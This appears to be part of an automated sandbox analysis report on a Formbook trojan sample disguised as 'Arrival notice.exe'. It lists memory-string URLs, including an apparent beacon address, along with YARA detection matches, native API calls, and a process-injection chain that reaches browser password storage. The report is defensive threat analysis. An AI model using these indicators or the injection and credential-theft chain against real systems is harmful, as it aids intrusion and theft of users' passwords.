            Source: mobsync.exe, 0000000C.00000003.1919141339.0000000007B7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: mobsync.exe, 0000000C.00000003.1919141339.0000000007B7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: mobsync.exe, 0000000C.00000003.1919141339.0000000007B7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: mobsync.exe, 0000000C.00000003.1919141339.0000000007B7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: mobsync.exe, 0000000C.00000003.1919141339.0000000007B7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: mobsync.exe, 0000000C.00000003.1919141339.0000000007B7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: mobsync.exe, 0000000C.00000003.1919141339.0000000007B7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: JGgOTaRBeKg.exe, 0000000B.00000002.3756739747.000000000822A000.00000004.80000000.00040000.00000000.sdmp, mobsync.exe, 0000000C.00000002.3751638320.000000000654A000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://help.reg.ru/support/ssl-sertifikaty/1-etap-zakaz-ssl-sertifikata/kak-zakazat-besplatnyy-ssl-
            Source: mobsync.exe, 0000000C.00000002.3748827254.0000000002E13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: mobsync.exe, 0000000C.00000002.3748827254.0000000002E13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: mobsync.exe, 0000000C.00000002.3748827254.0000000002E13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: mobsync.exe, 0000000C.00000002.3748827254.0000000002E13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: mobsync.exe, 0000000C.00000002.3748827254.0000000002E13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: mobsync.exe, 0000000C.00000002.3748827254.0000000002E13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: mobsync.exe, 0000000C.00000003.1913188921.0000000007B5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: JGgOTaRBeKg.exe, 0000000B.00000002.3756739747.000000000822A000.00000004.80000000.00040000.00000000.sdmp, mobsync.exe, 0000000C.00000002.3751638320.000000000654A000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://parking.reg.ru/script/get_domain_data?domain_name=www.albero-dveri.online&rand=
            Source: JGgOTaRBeKg.exe, 0000000B.00000002.3756739747.000000000822A000.00000004.80000000.00040000.00000000.sdmp, mobsync.exe, 0000000C.00000002.3751638320.000000000654A000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://reg.ru
            Source: JGgOTaRBeKg.exe, 0000000B.00000002.3756739747.00000000070E4000.00000004.80000000.00040000.00000000.sdmp, mobsync.exe, 0000000C.00000002.3751638320.0000000005404000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000011.00000002.2024715906.000000003FBA4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://wearenotgoingback.info/cjvv/?EZ2lo=4S8XY8l3MvvMOMyL3KrDz8kPPAGqnGng5tYYPWDdvWcwX33CgHNrDDjfF
            Source: mobsync.exe, 0000000C.00000003.1919141339.0000000007B7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: mobsync.exe, 0000000C.00000003.1919141339.0000000007B7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: JGgOTaRBeKg.exe, 0000000B.00000002.3756739747.000000000822A000.00000004.80000000.00040000.00000000.sdmp, mobsync.exe, 0000000C.00000002.3751638320.000000000654A000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/gtag/js?id=UA-3380909-25
            Source: JGgOTaRBeKg.exe, 0000000B.00000002.3756739747.000000000822A000.00000004.80000000.00040000.00000000.sdmp, mobsync.exe, 0000000C.00000002.3751638320.000000000654A000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/dedicated/?utm_source=www.albero-dveri.online&utm_medium=parking&utm_campaign=s_l
            Source: JGgOTaRBeKg.exe, 0000000B.00000002.3756739747.000000000822A000.00000004.80000000.00040000.00000000.sdmp, mobsync.exe, 0000000C.00000002.3751638320.000000000654A000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/domain/new/?utm_source=www.albero-dveri.online&utm_medium=parking&utm_campaign=s_
            Source: JGgOTaRBeKg.exe, 0000000B.00000002.3756739747.000000000822A000.00000004.80000000.00040000.00000000.sdmp, mobsync.exe, 0000000C.00000002.3751638320.000000000654A000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/hosting/?utm_source=www.albero-dveri.online&utm_medium=parking&utm_campaign=s_lan
            Source: JGgOTaRBeKg.exe, 0000000B.00000002.3756739747.000000000822A000.00000004.80000000.00040000.00000000.sdmp, mobsync.exe, 0000000C.00000002.3751638320.000000000654A000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/web-sites/?utm_source=www.albero-dveri.online&utm_medium=parking&utm_campaign=s_l
            Source: JGgOTaRBeKg.exe, 0000000B.00000002.3756739747.000000000822A000.00000004.80000000.00040000.00000000.sdmp, mobsync.exe, 0000000C.00000002.3751638320.000000000654A000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/web-sites/website-builder/?utm_source=www.albero-dveri.online&utm_medium=parking&
            Source: JGgOTaRBeKg.exe, 0000000B.00000002.3756739747.000000000822A000.00000004.80000000.00040000.00000000.sdmp, mobsync.exe, 0000000C.00000002.3751638320.000000000654A000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/whois/?check=&dname=www.albero-dveri.online&amp;reg_source=parking_auto

            E-Banking Fraud

            Source: Yara matchFile source: 9.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000C.00000002.3747714326.0000000002D10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.3758373668.0000000009130000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.3741834326.00000000007E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.1730283884.0000000008C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.1724645368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.3746700176.0000000002CC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.1725426506.0000000004390000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.3750353258.0000000003960000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            System Summary

            Source: 9.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 9.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000C.00000002.3747714326.0000000002D10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000B.00000002.3758373668.0000000009130000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000C.00000002.3741834326.00000000007E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000009.00000002.1730283884.0000000008C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000009.00000002.1724645368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000C.00000002.3746700176.0000000002CC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000009.00000002.1725426506.0000000004390000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000B.00000002.3750353258.0000000003960000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: initial sampleStatic PE information: Filename: Arrival notice.exe
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0042C883 NtClose,9_2_0042C883
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036735C0 NtCreateMutant,LdrInitializeThunk,9_2_036735C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03672B60 NtClose,LdrInitializeThunk,9_2_03672B60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03672DF0 NtQuerySystemInformation,LdrInitializeThunk,9_2_03672DF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03674340 NtSetContextThread,9_2_03674340
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03673010 NtOpenDirectoryObject,9_2_03673010
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03673090 NtSetValueKey,9_2_03673090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03674650 NtSuspendThread,9_2_03674650
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03672BE0 NtQueryValueKey,9_2_03672BE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03672BF0 NtAllocateVirtualMemory,9_2_03672BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03672BA0 NtEnumerateValueKey,9_2_03672BA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03672B80 NtQueryInformationFile,9_2_03672B80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03672AF0 NtWriteFile,9_2_03672AF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03672AD0 NtReadFile,9_2_03672AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03672AB0 NtWaitForSingleObject,9_2_03672AB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036739B0 NtGetContextThread,9_2_036739B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03672F60 NtCreateProcessEx,9_2_03672F60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03672F30 NtCreateSection,9_2_03672F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03672FE0 NtCreateFile,9_2_03672FE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03672FA0 NtQuerySection,9_2_03672FA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03672FB0 NtResumeThread,9_2_03672FB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03672F90 NtProtectVirtualMemory,9_2_03672F90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03672E30 NtWriteVirtualMemory,9_2_03672E30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03672EE0 NtQueueApcThread,9_2_03672EE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03672EA0 NtAdjustPrivilegesToken,9_2_03672EA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03672E80 NtReadVirtualMemory,9_2_03672E80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03673D70 NtOpenThread,9_2_03673D70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03672D30 NtUnmapViewOfSection,9_2_03672D30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03672D00 NtSetInformationFile,9_2_03672D00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03672D10 NtMapViewOfSection,9_2_03672D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03673D10 NtOpenProcessToken,9_2_03673D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03672DD0 NtDelayExecution,9_2_03672DD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03672DB0 NtEnumerateKey,9_2_03672DB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03672C60 NtCreateKey,9_2_03672C60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03672C70 NtFreeVirtualMemory,9_2_03672C70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03672C00 NtQueryInformationProcess,9_2_03672C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03672CF0 NtOpenProcess,9_2_03672CF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03672CC0 NtQueryVirtualMemory,9_2_03672CC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03672CA0 NtQueryInformationToken,9_2_03672CA0
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 12_2_04A635C0 NtCreateMutant,LdrInitializeThunk,12_2_04A635C0
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 12_2_04A64650 NtSuspendThread,LdrInitializeThunk,12_2_04A64650
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 12_2_04A64340 NtSetContextThread,LdrInitializeThunk,12_2_04A64340
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 12_2_04A62CA0 NtQueryInformationToken,LdrInitializeThunk,12_2_04A62CA0
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 12_2_04A62C60 NtCreateKey,LdrInitializeThunk,12_2_04A62C60
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 12_2_04A62C70 NtFreeVirtualMemory,LdrInitializeThunk,12_2_04A62C70
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 12_2_04A62DF0 NtQuerySystemInformation,LdrInitializeThunk,12_2_04A62DF0
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 12_2_04A62DD0 NtDelayExecution,LdrInitializeThunk,12_2_04A62DD0
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 12_2_04A62D30 NtUnmapViewOfSection,LdrInitializeThunk,12_2_04A62D30
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 12_2_04A62D10 NtMapViewOfSection,LdrInitializeThunk,12_2_04A62D10
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 12_2_04A62EE0 NtQueueApcThread,LdrInitializeThunk,12_2_04A62EE0
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 12_2_04A62FB0 NtResumeThread,LdrInitializeThunk,12_2_04A62FB0
            Source: C:\Windows\SysWOW64\mobsync.exe Code function: 12_2_04A62FE0 NtCreateFile,LdrInitializeThunk,12_2_04A62FE0
            Source: C:\Windows\SysWOW64\mobsync.exe Code function: 12_2_04A62F30 NtCreateSection,LdrInitializeThunk,12_2_04A62F30
            Source: C:\Windows\SysWOW64\mobsync.exe Code function: 12_2_04A639B0 NtGetContextThread,LdrInitializeThunk,12_2_04A639B0
            Source: C:\Windows\SysWOW64\mobsync.exe Code function: 12_2_04A62AF0 NtWriteFile,LdrInitializeThunk,12_2_04A62AF0
            Source: C:\Windows\SysWOW64\mobsync.exe Code function: 12_2_04A62AD0 NtReadFile,LdrInitializeThunk,12_2_04A62AD0
            Source: C:\Windows\SysWOW64\mobsync.exe Code function: 12_2_04A62B60 NtClose,LdrInitializeThunk,12_2_04A62B60
            Source: C:\Windows\SysWOW64\mobsync.exe Code function: 12_2_04A63090 NtSetValueKey,12_2_04A63090
            Source: C:\Windows\SysWOW64\mobsync.exe Code function: 12_2_04A63010 NtOpenDirectoryObject,12_2_04A63010
            Source: C:\Windows\SysWOW64\mobsync.exe Code function: 12_2_04A62CF0 NtOpenProcess,12_2_04A62CF0
            Source: C:\Windows\SysWOW64\mobsync.exe Code function: 12_2_04A62CC0 NtQueryVirtualMemory,12_2_04A62CC0
            Source: C:\Windows\SysWOW64\mobsync.exe Code function: 12_2_04A62C00 NtQueryInformationProcess,12_2_04A62C00
            Source: C:\Windows\SysWOW64\mobsync.exe Code function: 12_2_04A62DB0 NtEnumerateKey,12_2_04A62DB0
            Source: C:\Windows\SysWOW64\mobsync.exe Code function: 12_2_04A62D00 NtSetInformationFile,12_2_04A62D00
            Source: C:\Windows\SysWOW64\mobsync.exe Code function: 12_2_04A63D10 NtOpenProcessToken,12_2_04A63D10
            Source: C:\Windows\SysWOW64\mobsync.exe Code function: 12_2_04A63D70 NtOpenThread,12_2_04A63D70
            Source: C:\Windows\SysWOW64\mobsync.exe Code function: 12_2_04A62EA0 NtAdjustPrivilegesToken,12_2_04A62EA0
            Source: C:\Windows\SysWOW64\mobsync.exe Code function: 12_2_04A62E80 NtReadVirtualMemory,12_2_04A62E80
            Source: C:\Windows\SysWOW64\mobsync.exe Code function: 12_2_04A62E30 NtWriteVirtualMemory,12_2_04A62E30
            Source: C:\Windows\SysWOW64\mobsync.exe Code function: 12_2_04A62FA0 NtQuerySection,12_2_04A62FA0
            Source: C:\Windows\SysWOW64\mobsync.exe Code function: 12_2_04A62F90 NtProtectVirtualMemory,12_2_04A62F90
            Source: C:\Windows\SysWOW64\mobsync.exe Code function: 12_2_04A62F60 NtCreateProcessEx,12_2_04A62F60
            Source: C:\Windows\SysWOW64\mobsync.exe Code function: 12_2_04A62AB0 NtWaitForSingleObject,12_2_04A62AB0
            Source: C:\Windows\SysWOW64\mobsync.exe Code function: 12_2_04A62BA0 NtEnumerateValueKey,12_2_04A62BA0
            Source: C:\Windows\SysWOW64\mobsync.exe Code function: 12_2_04A62B80 NtQueryInformationFile,12_2_04A62B80
            Source: C:\Windows\SysWOW64\mobsync.exe Code function: 12_2_04A62BE0 NtQueryValueKey,12_2_04A62BE0
            Source: C:\Windows\SysWOW64\mobsync.exe Code function: 12_2_04A62BF0 NtAllocateVirtualMemory,12_2_04A62BF0
            Source: C:\Windows\SysWOW64\mobsync.exe Code function: 12_2_008090F0 NtCreateFile,12_2_008090F0
            Source: C:\Windows\SysWOW64\mobsync.exe Code function: 12_2_00809260 NtReadFile,12_2_00809260
            Source: C:\Windows\SysWOW64\mobsync.exe Code function: 12_2_008093F0 NtClose,12_2_008093F0
            Source: C:\Windows\SysWOW64\mobsync.exe Code function: 12_2_00809350 NtDeleteFile,12_2_00809350
            Source: Arrival notice.exe, 00000002.00000003.1336708354.0000000004B33000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs Arrival notice.exe
            Source: Arrival notice.exe, 00000002.00000003.1337343029.0000000004CDD000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs Arrival notice.exe
            Source: Arrival notice.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 9.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 9.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000C.00000002.3747714326.0000000002D10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000B.00000002.3758373668.0000000009130000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000C.00000002.3741834326.00000000007E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000009.00000002.1730283884.0000000008C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000009.00000002.1724645368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000C.00000002.3746700176.0000000002CC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000009.00000002.1725426506.0000000004390000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000B.00000002.3750353258.0000000003960000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@7/2@16/11
            Source: C:\Users\user\Desktop\Arrival notice.exe File created: C:\Users\user\AppData\Local\Temp\spiketop
            Source: Arrival notice.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\Arrival notice.exe File read: C:\Users\desktop.ini
            Source: C:\Users\user\Desktop\Arrival notice.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: mobsync.exe, 0000000C.00000002.3748827254.0000000002E9F000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 0000000C.00000002.3748827254.0000000002E7B000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 0000000C.00000003.1914568553.0000000002E50000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 0000000C.00000003.1915469281.0000000002E71000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 0000000C.00000002.3748827254.0000000002E71000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: Arrival notice.exe ReversingLabs: Detection: 55%
            Source: Arrival notice.exe Virustotal: Detection: 45%
            Source: C:\Users\user\Desktop\Arrival notice.exe File read: C:\Users\user\Desktop\Arrival notice.exe
            Source: unknown Process created: C:\Users\user\Desktop\Arrival notice.exe "C:\Users\user\Desktop\Arrival notice.exe"
            Source: C:\Users\user\Desktop\Arrival notice.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Arrival notice.exe"
            Source: C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exe Process created: C:\Windows\SysWOW64\mobsync.exe "C:\Windows\SysWOW64\mobsync.exe"
            Source: C:\Windows\SysWOW64\mobsync.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\Arrival notice.exe Section loaded: apphelp.dll
            Source: C:\Users\user\Desktop\Arrival notice.exe Section loaded: wsock32.dll
            Source: C:\Users\user\Desktop\Arrival notice.exe Section loaded: version.dll
            Source: C:\Users\user\Desktop\Arrival notice.exe Section loaded: winmm.dll
            Source: C:\Users\user\Desktop\Arrival notice.exe Section loaded: mpr.dll
            Source: C:\Users\user\Desktop\Arrival notice.exe Section loaded: wininet.dll
            Source: C:\Users\user\Desktop\Arrival notice.exe Section loaded: userenv.dll
            Source: C:\Users\user\Desktop\Arrival notice.exe Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\Arrival notice.exe Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\Arrival notice.exe Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\Arrival notice.exe Section loaded: kernel.appcore.dll
            Source: C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exe Section loaded: wininet.dll
            Source: C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exe Section loaded: mswsock.dll
            Source: C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exe Section loaded: dnsapi.dll
